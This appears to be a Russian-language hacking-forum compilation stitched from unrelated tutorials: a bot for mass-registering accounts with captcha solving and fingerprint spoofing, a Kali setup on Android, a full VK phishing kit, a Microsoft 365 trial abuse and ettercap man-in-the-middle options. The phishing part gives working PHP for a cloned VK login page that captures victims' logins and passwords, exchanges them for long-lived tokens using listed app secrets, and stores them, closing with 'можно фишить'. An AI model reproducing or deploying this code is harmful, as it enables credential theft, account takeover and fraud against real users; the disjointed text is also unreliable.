Что понадобится:

Сама программа bas;

Хорошие прокси (iPv4 с ротацией);

rucaptcha/captchaguru key (на captchaguru дешевле не реклама).

Fingerprint (бесплатного будет достаточно)​.

Написание проекта

Первое что вы делаете - это качаете bas, открываете его и начинаете запись проекта:

Приступаем

Часть 1

Когда вы начнете запись первое что вы увидите это интерфейс:

Далее нам нужно найти модуль "Браузер" и нажимаем на него, нажимаем на "загрузить" и вставляем эту ссылку:

Если вы все сделали правильно у вас появится это окно:

Далее нам нужно как-то сгенерировать имя, фамилию, пароль и т.д. Для этого есть два специальных модуля "Шаблон" и "Случайная строка" , чтобы их найти воспользуйтесь поиском.

Начнем с имени и фамилии

Открываем шаблон и в пустою строку вписываем <EFemName> (если вы хотите мужское имя то вписывайте <EMaleName>):

Почти тоже самое делаем с фамилией :

Далее генерируем логин и пароль

Воспользуемся модулем "Случайная строка", в логине нжно удалить все цифры так как логин не должен начинаться с цифры:

С паролем делаем тоже самое только не удаляем цифры и удаляем половину букв​.

ВАЖНО! Не забудьте менять имя переменной это очень важно ( пишите в имени TEMPLATE_RESULT_NAME , а в фамилии TEMPLATE_RESULT_SURNAME )

Теперь нужно проверить все ли вы сделали правильно.Для этого нужно нажать на "жучка":

Далее нужно вставить эти данные в строку (это очень легко)​. Выделяем файл в который нам нужно вставить данные и кликаем по нему правой кнопкой мыши, начнем с имени:

ВАЖНО! Текст для ввода берите с переменной в которую вы сохраняли текст (если это имя то вставляйте переменную [[TEMPLATE_RESULT_NAME]] , если фамилия [[TEMPLATE_RESULT_SURNAME]] и тд )

Если вы все сделали правильно то скрипт сам введет нужный текст. С паролем логином и фамилией делаем все тоже самое. Как только вы дойдете то номера телефона нужно что бы скрипт сам кликал на "У меня нет телефона" (это тоже очень легко сделать):

Часть 2

В этой части я расскажу вам как заполнить комбобокс и решить капчу. Начнем с легкого для того что бы заполнить комбобок снужно сделать так что бы скрипт выбирал между 1 и 3 числом это поможет сделать модуль "Случайное число":

Далее вставляем кликаем правой кнопкой мыши по области с комбобоксом и ищем "установить индекс комбобокса", в ответе на вопрос можете написать все что угодно, я напишу свой ник ОБЯЗАТЕЛЬНО вписывайте в поле которое указано на скрине:

Теперь я расскажу вам как решить капчу.

1. Определиться с сервисом (я буду использовать chaptchaguru через rucaptcha);

2. Закинуть деньги на баланс вашего сервиса;

3. Выделить область с капчей;

4. Вставить ключ.

Когда вы дошли до 3 пункта читайте дальше. Выбирайте свой сервис (в моей случае rucaptcha):

В 1 строку вставляете ключ, а во вторую если вы используете сервис rucaptcha или другие сервисы которые там есть, вам ничего вставлять не нужно. Если вы как и я используйте captchaguru, то во вторую ссылку вам нужно вставить " api.captcha.guru ". После того как вы все ввели отправляйте запрос (просто нажмите ок). Если вы все сделали правильно, то отроется анализ трафика:

А позже придет ответ (он сохранится в переменную CAPTCHA_RESULT).

Далее делаем просто вводим текст в панель ответа капчи (обязательно с помощью правой кнопки и "ввод текста"). И самая большая проблема в решении капчи это неправильный ответ, юзеры которые решают капчу часто допускают ошибки. Это можно пофиксить с помощью модуля "if" , но новичок не сможет понять как это сделать (если у вас будет эта ошибка просто перезапустите скрипт).

Далее просто выделяем область с "Зарегистрироваться" правый клик и двигать мышь и кликнуть по элементу". Если у вас появляется" Политика конфиденциальности", то просто продублируйте клик:

Как использовать прокси и Fingerprint в следующей части.

Часть 3

Это самая затратная часть проекта.

1. Что нужно это прокси с iPv4 с ротацией (можете использовать любые другие прокси , но тогда я не могу гарантировать что у вас все будет работать);

2. Fingerprint у него есть 2 версии я буду использовать бесплатную.

Перейдем к действиям сначала нам нужно сохранить и перезапустить проект (ctrl + s) а что бы перезапустить проект нажмите на стрелку вверху:

1. Ищем модуль "Получить отпечаток" ищите через поиск модулей, если у вас не ключа ничего не туда не пишите просто сохраните:

Если вы все сделали правильно вам придет сообщение в анализ трафика:

1 это то что вам должно прийти, 2 это куда надо нажать чтоб скопировать 3 и 4 это настройки вашего фек браузера. Далее ищите модуль "Применить Отпечаток" и вставляем код в "отпечаток". Не спрашивайте почему так нужно, просто сделайте. Далее все сохраняем. Еще можно сделать подмену вашей производительности:

Выбираем и нажимаем ОК.

ВАЖНО! Все строки с fingerprint нужно перенести в вверх кода:

1. Ищем модуль прокси в поиске;

2. Далее в 1 строку вставляем ip прокси;

3. Во вторую login (если его нет ничего не пишите);

4. в третью строку пароль (если его тоже нет ничего не пишем);

5. В настройках безопасности все пункты должны быть "true";

6. Далее нажимаем ок и перетаскиваем прокси под finger print.

Пример прокси с логином и паролем (5.188.44.15:56243:3fanysLP:FTM2EXQL):

Если вы все сделали правильно вам придет сообщение в контроль трафика (если прокси рабочие то их статус будет ~200).

Средние цены на аккаунты.

Цена на один авторег 1-4 руб..

Выбираем дистрибутив из списка, я беру kali. Жмём на название дистрибутива. У вас начнётся загрузка.

Задаём логин, пароль, пароль vnc. Пароли можно задавать лёгкие, т.к. никто не получит доступ извне.

Дальше нас перебросит в такое окно:

Выбираем ssh, как по умолчанию, т.к. в "графическом" vnc вам придётся щуриться.

Ждём пока все загрузится.

Сейчас откроется похожая

Копия термукса, только kali.Нужно ввести пароль.

Если у вас появилась подобная строка значит всё работает.

Теперь о командах в Linux (для самых маленьких):

Чтобы установить пакет, в термуксе мы используем команду:

pkg install имя_пакета

В линуксе нужно писать команду:

sudo apt install имя_пакета

В Линукс к каждой команде нужно добавлять в начале

sudo

Пример:

termux:

python anongroup.py

Та же команда в Linux:

sudo python anongroup.py

Наш канал

Делать мы это будем с помощью cUrl и прямой авторизации через API VK. Выполнять авторизацию будем, представляясь официальным приложением. Запрос на прямую авторизацию выглядит примерно так:

Код:

https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение]

https://api.vk.com/oauth/token?grant_type=password&client_id=[наше значение]&scope=[наше значение]&client_secret=[наше значение]&username=[наше значение]&password=[наше значение]

Что все это значит:

• client_id - это id нашего приложения. Запишем в client_id значение 2274003.
• scope - права доступа, необходимые приложению. Усложнять себе жизнь мы не будем, а просто запросим офлайн токен, записав в scope значение "offline". Этого будет достаточно, чтобы входить на страницу ВК по токену через apidog.ru.
• !Важно: такой токен "живет" до тех пор, пока пользователь не сменит пароль, либо завершит все сессии в настройках безопасности.
• client_secret - секретный ключ Вашего приложения. Будет равен hHbZxrka2uZ6jB1inYsH
• username - логин пользователя ВКонтакте
• password - пароль пользователя ВКонтакте

Варианты официальных clenit_id и client_secret

Android:

client_id: 2274003

client_secret: hHbZxrka2uZ6jB1inYsH

IPhone:

client_id: 3140623

client_secret: VeWdmVclDCtn6ihuP1nt

IPad:

client_id: 3682744

client_secret: mY6CDUswIVdJLCD3j15n

Windows desktop:

client_id: 3697615

client_secret: AlVXZFMUqyrnABp8ncuU

Windows phone:

client_id: 3502557

client_secret: PEObAuQi6KloPM4T30DV

Теперь необходима форма авторизации как в вк.

• Создадим php документ authorize.php

authorize.php:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
  <?php
  $errorGet = $_GET['error_login'];
    if (!$errorGet)
    {
        echo "<style>
        #hide_row_pass {display: none;}
        </style>";
    }
else
    {
        echo "<style>
        #hide_row_pass {display: block;}
        </style>";
    }
  ?>
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title>ВКонтакте | Вход</title>
    <link rel="stylesheet" type="text/css" href="css/al/common.css?34795707965" /><link rel="stylesheet" type="text/css" href="css/al/fonts_cnt.css?5181750877" />
    <link type="text/css" rel="stylesheet" href="css/api/oauth_popup.css?29651175773"></link>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <link rel="shortcut icon" href="images/icons/favicons/fav_logo_2x.ico?8"></link>
  </head>

  <body class="VK oauth_centered">
    <script>
      if (window.devicePixelRatio >= 2) document.body.className += ' is_2x';
    </script>
    <div class="oauth_wrap">
      <div class="oauth_wrap_inner">
        <div class="oauth_wrap_content" id="oauth_wrap_content">
          <div class="oauth_head">
  <a class="oauth_logo fl_l" href="https://vk.com" target="_blank"></a>
  <div id="oauth_head_info" class="oauth_head_info fl_r">
    <a class="oauth_reg_link" href="https://vk.com/join?reg=1" target="_blank">Регистрация</a>
  </div>
</div>

<div class="oauth_content box_body clear_fix">
  <div class="box_msg_gray box_msg_padded">Для продолжения Вам необходимо войти <b>ВКонтакте</b>.</div>

  <form method="POST" id="login_submit" action="login.php">
    <div class="oauth_form">
  
    <div id="hide_row_pass" class="box_error">Указан неверный логин или пароль.</div>
      <div class="oauth_form_login">
        <div class="oauth_form_header">Телефон или email</div>
        <input type="text" class="oauth_form_input dark" name="login" value="">
        <div class="oauth_form_header">Пароль</div>
        <input type="password" class="oauth_form_input dark" name="password" />
  
        <button class="flat_button oauth_button button_wide" id="install_allow" type="submit" name="submit_login">Войти</button>
        <a class="oauth_forgot" href="https://vk.com/restore" target="_blank">Забыли пароль?</a>
      </div>
    </div>
  </form>
</div>
        </div>
      </div>
    </div>
  </body>
</html>

Архив со всеми картинками и стилями:

https://my-files.su/34zvpj

Выглядеть будет так:

• Теперь нужен файл, который будет отсылать логин и пароль на авторизацию и получение токена. Назовем login.php

Но перед этим создадим БД куда будем записывать все валидные данные.

1. Переходим на хостинге в PhpMyAdmin и нажимаем "Создать"

2. Создадим таблицу на 7 столбцов

3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя (first_name) и Фамилия (last_name) зададим как на картинке

В параметрах столбца id должен быть отмечен параметр "A_I" (auto_increment) и стоять PRIMARY KEY.

Теперь сам файл login.php:

<?php
//Создадим headers
$headers = array(
'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'content-type' => 'application/x-www-form-urlencoded',
'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
);
//Запишем сюда значения логина и пароля из HTML формы
$login = $_POST['login'];
$password = $_POST['password'];
//Если какое-то поле оказалось пустым
if (empty($login) or empty($password))
{
//Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке
    header('Location: /authorize.php?error_login=true');
    exit;
}
    else
{
//Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше
    $get_token = post ('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.'' ,array(
    'headers' => array(
    'accept: '.$headers['accept'],
    'content-type: '.$headers['content-type'],
    'user-agent: '.$headers['user-agent']
    )
    ));
//Если авторизация прошла успешно
if (preg_match("/[a-z0-9]{85}/", $get_token['headers'], $token))
{
    $token1 = json_decode(file_get_contents('https://api.vk.com/oauth/token?grant_type=password&client_id=2274003&scope=offline&client_secret=hHbZxrka2uZ6jB1inYsH&username='.$login.'&password='.$password.''), true);
   $data = json_decode(file_get_contents('https://api.vk.com/method/users.get?user_id='.$token1['user_id'].'&access_token='.$token[0].'&fields=uid,first_name,last_name&v=5.80'), true);

   //Записываем в переменную текущую дату и время сервера
$date_l = date("H:i:s  d-m-Y");
//Подключаемся к БД
    $host="localhost";
    $user=""; //Имя пользователя от MySql
    $pass=""; //Пароль от MySql
    $db_name=""; //Имя базы
    $link=mysql_connect($host,$user,$pass);
    mysql_select_db($db_name,$link);
    mysql_query("set names utf8");
//Выполняем запись валида в БД
    $sql = mysql_query("INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES('".$login."','".$password."','".$token[0]."','".$date_l."','".$token1['user_id']."','".$data['response'][0]['first_name']."','".$data['response'][0]['last_name']."')");
//Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт
    if ($sql) {
        session_start();
        $_SESSION['logged_user'] = $data['response'][0]['first_name'];
        header('Location: vk.com/');
//Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке
    } else header('Location: /authorize.php?error_login=true');
//Закрываем соединение
mysql_close($link);
exit;
}
//Если авторизация не прошла, то отправим пользователя на стартовую страницу с  ошибкой
else header('Location: /authorize.php?error_login=true');
}
//cUrl POST
function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

if(isset($params['params'])) {
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $params['params']);
}

if(isset($params['headers'])) {
  curl_setopt($ch, CURLOPT_HTTPHEADER, $params['headers']);
}

if(isset($params['cookies'])) {
  curl_setopt($ch, CURLOPT_COOKIE, $params['cookies']);
}

if($proxy) {
  curl_setopt($ch, CURLOPT_PROXY, $proxy);

  if($proxy_userpwd) {
   curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd);
  }
}

$result = curl_exec($ch);
$result_explode = explode("\r\n\r\n", $result);

$headers = ((isset($result_explode[0])) ? $result_explode[0]."\r\n" : '').''.((isset($result_explode[1])) ? $result_explode[1] : '');
$content = $result_explode[count($result_explode) - 1];


preg_match_all('|Set-Cookie: (.*);|U', $headers, $parse_cookies);

$cookies = implode(';', $parse_cookies[1]);

curl_close($ch);

return array('headers' => $headers, 'cookies' => $cookies, 'content' => $content);
}
?>

В переменные $host="localhost";

$user=""; //Имя пользователя от MySql

$pass=""; //Пароль от MySql

$db_name=""; //Имя базы

вписываем наши данные

На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно.

header('Location: "Ваш сайт" ');

Осталось залить все файлы на хостинг и можно фишить.

Идём на сайт https://www.microsoft.com/ru-ru/microsoft-365/academic/compare-office-365-education-plans?silentauth=1&market=tm&activetab=tab:primaryr1

Выбираем страну снг но не Россию.

Жмём на кнопку.

Указываем всё кроме почты на рандом.

Далее выбираем домен,создаём учётку админа.

Дальше попросит ввести номер телефона.Нужно вводить уже реальный.

Подтверждаем номер.Страницу не закрываем ждём.

Как только настройка завершается,заходим под этими данными в ONEDRIVE и наслаждаемся виртуальным диском.

Далее mitm — это сокращение от Man in the middle, MitM-атака, т. е. атака Человек посередине. Подробную инструкцию по установке можно найти тут.

Опции сниффинга и атаки:

-M, --mitm <METHOD:ARGS> выполнить атаку mitm

-o, --only-mitm не сниффить, только выполнить атаку mitm

-b, --broadcast сниффить пакеты, предназначенные для транляции

-B, --bridge <IFACE> использовать мостовой снифф (нужно 2 интерфейса)

-p, --nopromisc не переводить интерфейс в неразборчивый режим

-S, --nosslmitm не подделывать SSL сертификаты

-u, --unoffensive не перенаправлять пакеты

-r, --read <file> прочитать данные из pcapfile <файл>

-f, --pcapfilter <строка> установить <строку> pcap фильтром

-R, --reversed использовать обратное соответствие ЦЕЛИ

-t, --proto <протокол> сниффить только этот протокол (по умолчанию - все)

--certificate <файл> файл сертификата для использования с SSL MiTM

--private-key <файл> файл личного ключа для использования с SSL MiTM

Тип пользовательского интерфейса:

-T, --text использовать только текстовый интерфейс

-q, --quiet не показывать содержимое пакетов

-s, --script <CMD> выполнить эти команды для GUI

-C, --curses использовать интерфейс curses

-D, --daemon демонизировать ettercap (нет интерфейса)

-G, --gtk использовать интерфейс GTK+

Опции ведения логов:

-w, --write <файл> записать перехваченные данные в pcapfile <файл>

-L, --log <логфайл> записать весь трафик в этот <логфайл>

-l, --log-info <логфайл> записать только пассивную информацию в этот <логфайл>

-m, --log-msg <логфайл> записать все сообщения в этот <логфайл>

-c, --compress использовать сжатие gzip для файлов логов

Опции визуализации:

-d, --dns резолвить ip адреса в адреса хостов

-V, --visual <формат> задать формат визуализации

-e, --regex <регвыраж> визуализировать только пакеты, соответствующие этому регулярному выражению

-E, --ext-headers записать расширенные заголовки для каждого pck

-Q, --superquiet не показывать пользователей и пароли

Опции LUA:

--lua-script <скрипт1>,[<скрипт2>,...] список скриптов LUA, разделённые запятой

--lua-args n1=v1,[n2=v2,...] разделённые запятой список аргументов скрипта(ов) LUA

Общие опции:

-i, --iface <iface> использовать этот сетевой интерфейс

-I, --liface показать все сетевые интерфейсы

-Y, --secondary <интерф> список вторичных сетевых интерфейсов

-n, --netmask <сетмаска> установить эту <сетевую маску> на интерфейсе

-A, --address <адрес> установить этот локальный <адрес> для интерфейса

-P, --plugin <плагин> запустить этот <плагин>

-F, --filter <файл> загрузить <файл> фильтра (содержимое фильтра)

-z, --silent не выполнять начальное ARP сканирование

-6, --ip6scan отправить ICMPv6 зонды для обнаружения IPv6 узлов на связи

-j, --load-hosts <файл> загрузить список хостов из <файла>

-k, --save-hosts <файл> сохранить список хостов в <файл>

-W, --wifi-key <wkey> использовать этот ключ для расшифровки Wi-Fi пакетов (wep или wpa)

-a, --config <конфиг> использовать альтернативный файл <конфигурации>

Стандартные опции:

-v, --version напечатать версию и выйти

-h, --help напечатать справку

Руководство по Ettercap

ИМЯ

ettercap — многоцелевой сниффер/фильтр контента для атак человек-посередине.

***** ВАЖНОЕ ЗАМЕЧАНИЕ ******

Начиная с ettercap NG (до 0.7.0) все опции были изменены. Изменена была даже спецификация целей. Пожалуйста, прочитайте внимательно это руководство.

СИНТАКСИС

1

ettercap [ОПЦИИ] [ЦЕЛЬ1] [ЦЕЛЬ2]

Если включён IPv6:

ЦЕЛЬ в виде MAC/IPs/IPv6/ПОРТЫ

В противном случае,

ЦЕЛЬ в виде MAC/IPs/ПОРТЫ

где IPs и ПОРТЫ могут быть диапазонами (к примеру, /192.168.0.1-30,40,50/20,22,25)